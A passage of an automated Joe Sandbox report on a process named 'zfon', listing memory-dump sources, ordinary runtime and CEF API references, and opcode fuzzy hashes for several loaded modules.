                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___lc_locale_name_funcfreemallocmemcpywcsnlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3567269174-0
                                                                                                                                                                            • Opcode ID: f30811991d692bedc0c7a1c88b05bcfd0119dbfede1abc1abae9bd436faa4321
                                                                                                                                                                            • Instruction ID: 0621ae932e17e5a826206f83f09922bd1870658c14b867595530092bdbddecc5
                                                                                                                                                                            • Opcode Fuzzy Hash: f30811991d692bedc0c7a1c88b05bcfd0119dbfede1abc1abae9bd436faa4321
                                                                                                                                                                            • Instruction Fuzzy Hash: 7121D7A9708B9241E7208F22E44042B9B90FB49FE4F945631DE6D27794DF3CE4568B44
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: std::locale::_$Setgloballocalesetlocale$InitLocimpLocimp::_New__lock_locales
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2905786255-0
                                                                                                                                                                            • Opcode ID: 7533d42a88b30cf4c54e14bc2d80b216ec68bb4ad39f55c3e1146a9e5df12688
                                                                                                                                                                            • Instruction ID: 517bca6c3a815dbd489814297e5c5f3e68d639d6c8c159ceafbaa23bd9df405b
                                                                                                                                                                            • Opcode Fuzzy Hash: 7533d42a88b30cf4c54e14bc2d80b216ec68bb4ad39f55c3e1146a9e5df12688
                                                                                                                                                                            • Instruction Fuzzy Hash: 1931BFBAA14F0183EB149F6AD59417A63A1FB48FD0F049130DA1E677A1DF3CE461C740
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25C3
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25D3
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25E3
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB25F0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            • Opcode ID: 09fd9b7f2d28d969b82d29a789759c274fd24cd7d2748fe4802a739e8160af33
                                                                                                                                                                            • Instruction ID: e90b7727abacc7bafd8ef1e1b0195097ffb526940eb0803fe335d650ccbba5db
                                                                                                                                                                            • Opcode Fuzzy Hash: 09fd9b7f2d28d969b82d29a789759c274fd24cd7d2748fe4802a739e8160af33
                                                                                                                                                                            • Instruction Fuzzy Hash: F121D372A0C64751FE34AB38F464379B766EB857B0F940330D6AE02AE6DF2CD4908620
                                                                                                                                                                            APIs
                                                                                                                                                                            • ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B36FF4
                                                                                                                                                                            • ___lc_collate_cp_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B36FFE
                                                                                                                                                                              • Part of subcall function 00007FFBC1B39320: __strncnt.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FFBC1B3705B), ref: 00007FFBC1B39363
                                                                                                                                                                              • Part of subcall function 00007FFBC1B39320: __strncnt.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,00007FFBC1B3705B), ref: 00007FFBC1B39388
                                                                                                                                                                              • Part of subcall function 00007FFBC1B39320: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FFBC1B3705B), ref: 00007FFBC1B393C8
                                                                                                                                                                            • memcmp.VCRUNTIME140 ref: 00007FFBC1B37021
                                                                                                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B3705F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __strncnt$Info___lc_collate_cp_func___lc_locale_name_func_errnomemcmp
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3421985146-0
                                                                                                                                                                            • Opcode ID: 02edfa4313c4fb3aabff1bebf8c1357e348f0fccc221029525811e02a34b2029
                                                                                                                                                                            • Instruction ID: 14aaa7279f34bc76ebecd66e39392eb028217b6a8bc0ef47977cb56280372913
                                                                                                                                                                            • Opcode Fuzzy Hash: 02edfa4313c4fb3aabff1bebf8c1357e348f0fccc221029525811e02a34b2029
                                                                                                                                                                            • Instruction Fuzzy Hash: C52162B9A08B8286EB108F36D44016AF7A4FB88FD0B945135DA4D67795DF3CE451CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB6623
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB6633
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB6643
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB6650
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            • Opcode ID: b95c016416db0c7f8fb3c8f7d6a9f229c93ff0f0e18789e355680685c849e604
                                                                                                                                                                            • Instruction ID: 2a82e96fd0a46c9b76091276a4d3f9fb1f44c93370dce5383feb65d4f022a4ca
                                                                                                                                                                            • Opcode Fuzzy Hash: b95c016416db0c7f8fb3c8f7d6a9f229c93ff0f0e18789e355680685c849e604
                                                                                                                                                                            • Instruction Fuzzy Hash: 3611C362E0CA4791FE38A738E458339A772EB857B4F941730D6AE06AD5DF2CD0904A20
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3041573648-0
                                                                                                                                                                            • Opcode ID: 7d4bbb70432d916687639b929200fd9207a111d92069894b91313117c6e492f1
                                                                                                                                                                            • Instruction ID: 5ef1ec1061765a4a8667d7efd4d96aa3b21d68270dc540b45d20308a291dba46
                                                                                                                                                                            • Opcode Fuzzy Hash: 7d4bbb70432d916687639b929200fd9207a111d92069894b91313117c6e492f1
                                                                                                                                                                            • Instruction Fuzzy Hash: 8821A436A0CB8285EB71AB25B440269F7A1FB88BC4F894134EACE4775AEF3CD5418750
                                                                                                                                                                            APIs
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB34D0
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB34E0
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB34F0
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF79CFB34FD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3668304517-0
                                                                                                                                                                            • Opcode ID: 92a2097852ec47728736fe8942dbd70fe199a2d08fb94bba399e5a4b162ee94b
                                                                                                                                                                            • Instruction ID: bcab6fea16b7fc257279bb31a4dc26d1b3618d0a4321f788b05594d5812c57c8
                                                                                                                                                                            • Opcode Fuzzy Hash: 92a2097852ec47728736fe8942dbd70fe199a2d08fb94bba399e5a4b162ee94b
                                                                                                                                                                            • Instruction Fuzzy Hash: 98119423A4864781EF28AB79E508338E272EB49BA4FD40531C66E033D5DF7DD4888225
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3041573648-0
                                                                                                                                                                            • Opcode ID: 7197ee378ef0cece509e4b77bb64e0ce9f980a1e7a92a43fd744432bfccf45b7
                                                                                                                                                                            • Instruction ID: 0060cbb6510ff74f4bfeef4a5643e00aad4fbf3eea9d902190ff5166e814e81d
                                                                                                                                                                            • Opcode Fuzzy Hash: 7197ee378ef0cece509e4b77bb64e0ce9f980a1e7a92a43fd744432bfccf45b7
                                                                                                                                                                            • Instruction Fuzzy Hash: F121C866A08B8197E754CB3AE6416A9B360F759798F00A125EF9E53A12DF38F1E4C700
                                                                                                                                                                            APIs
                                                                                                                                                                            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF79CFD2D11), ref: 00007FF79CFDB4F7
                                                                                                                                                                              • Part of subcall function 00007FF79CFD98A0: memmove.VCRUNTIME140 ref: 00007FF79CFD9939
                                                                                                                                                                            • cef_string_map_alloc.LIBCEF ref: 00007FF79CFDB52C
                                                                                                                                                                            • SetLastError.KERNEL32 ref: 00007FF79CFDB555
                                                                                                                                                                            • ?_Ios_base_dtor@ios_base@std@@CAXPEAV12@@Z.MSVCP140 ref: 00007FF79CFDB58A
                                                                                                                                                                              • Part of subcall function 00007FF79CFD9270: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFD2D11), ref: 00007FF79CFD927A
                                                                                                                                                                              • Part of subcall function 00007FF79CFD9270: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFD2D11), ref: 00007FF79CFD928F
                                                                                                                                                                              • Part of subcall function 00007FF79CFD9270: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFD2D11), ref: 00007FF79CFD929F
                                                                                                                                                                              • Part of subcall function 00007FF79CFD9270: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFD2D11), ref: 00007FF79CFD92AF
                                                                                                                                                                              • Part of subcall function 00007FF79CFD9270: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF79CFD2D11), ref: 00007FF79CFD92BC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$V01@$??6?$basic_ostream@D@std@@@std@@ErrorIos_base_dtor@ios_base@std@@LastU?$char_traits@V01@@V12@@cef_string_map_allocmemmove
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1591153422-0
                                                                                                                                                                            • Opcode ID: e478e4a49091e4febd9e88758899345e0d7ad71bdfea3095cc3ece45b93430a1
                                                                                                                                                                            • Instruction ID: 67b6d1e9f5e0bf17cdc5fe4f805d6da02a2b15b2d207ace22235494b2a28ba10
                                                                                                                                                                            • Opcode Fuzzy Hash: e478e4a49091e4febd9e88758899345e0d7ad71bdfea3095cc3ece45b93430a1
                                                                                                                                                                            • Instruction Fuzzy Hash: 5111EF36618A8686EF20EF39E4512A9B371FB85B88FC00136DA9D07669DF3CD545C760
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_func
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3203701943-0
                                                                                                                                                                            • Opcode ID: 39f0dbf7affc20ace0cd8a52b7416ca02a5e873dcbaf1932feb67f8f83f8ece6
                                                                                                                                                                            • Instruction ID: 384ee7fc6a4f67c0a8aba0bedb117a98004e219d55f3c4f7792a7699f038ec0a
                                                                                                                                                                            • Opcode Fuzzy Hash: 39f0dbf7affc20ace0cd8a52b7416ca02a5e873dcbaf1932feb67f8f83f8ece6
                                                                                                                                                                            • Instruction Fuzzy Hash: 5101F1E6A08A9186EF095F3AD40446AA7A1FF5CFC0B48E031DA194B609DE3CD080CB20
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                            • Opcode ID: d0d271f438ed08dbae623c384d3e10f076376a6d5000b6ec581f085f3f477592
                                                                                                                                                                            • Instruction ID: 63f219308c90e5e67829204f42d177fe881998106e82aa53f0328f8b792d3263
                                                                                                                                                                            • Opcode Fuzzy Hash: d0d271f438ed08dbae623c384d3e10f076376a6d5000b6ec581f085f3f477592
                                                                                                                                                                            • Instruction Fuzzy Hash: 9D114C66B14B018AEB008F70E8543AA33A4FB1D759F441E31DA2D527A4DF3CD1698740
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007378246.00007FFBC1B01000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFBC1B00000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007356448.00007FFBC1B00000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007408551.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007441500.00007FFBC1B08000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007462693.00007FFBC1B09000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b00000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                            • Opcode ID: 97e3b286ae614011fb11402c562bf5637a4e2633fea006b985175adf9c6b4b30
                                                                                                                                                                            • Instruction ID: a672f65f05519d877e17914ef7966a3a130970630e197c9ca33697a02d696141
                                                                                                                                                                            • Opcode Fuzzy Hash: 97e3b286ae614011fb11402c562bf5637a4e2633fea006b985175adf9c6b4b30
                                                                                                                                                                            • Instruction Fuzzy Hash: DB1121A6B14F0189EB00CF70E8942B933A8FB1D758F442D31DA5D56B54EF7CD1588740
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmpDownload File
